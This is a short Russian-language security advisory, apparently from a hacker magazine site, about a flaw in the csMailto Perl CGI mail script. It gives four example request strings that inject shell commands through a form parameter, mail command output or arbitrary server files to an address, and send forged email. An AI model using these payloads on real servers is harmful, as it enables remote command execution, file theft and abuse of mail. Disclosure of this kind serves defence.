Хакер #305. Многошаговые SQL-инъекции
csMailto - perl сценарий от CGIscript.net. Сценарий хранит все данные конфигурации в скрытых полях формы, полагаясь на то, что пользователь не будет изменять их. Также присутствует проверка поля refer, которую также легко обойти. Уязвимость позволяет выполнять произвольные команды на сервере, отправлять любые электронные сообщения, отправлять любые файлы на сервере любому пользователю и т.п. Пример:
1. Выполнение произвольных команд на сервере:
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
2. Выполнение команд на сервере и отправка результатов по электронной почте:
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform
3. Отправка произвольных файлов: CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform
4. Отправка сообщений любому пользователю: CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&form-results=body&command=mailform
Скрипт очень популярен и его используют более 17000 Web сайтов.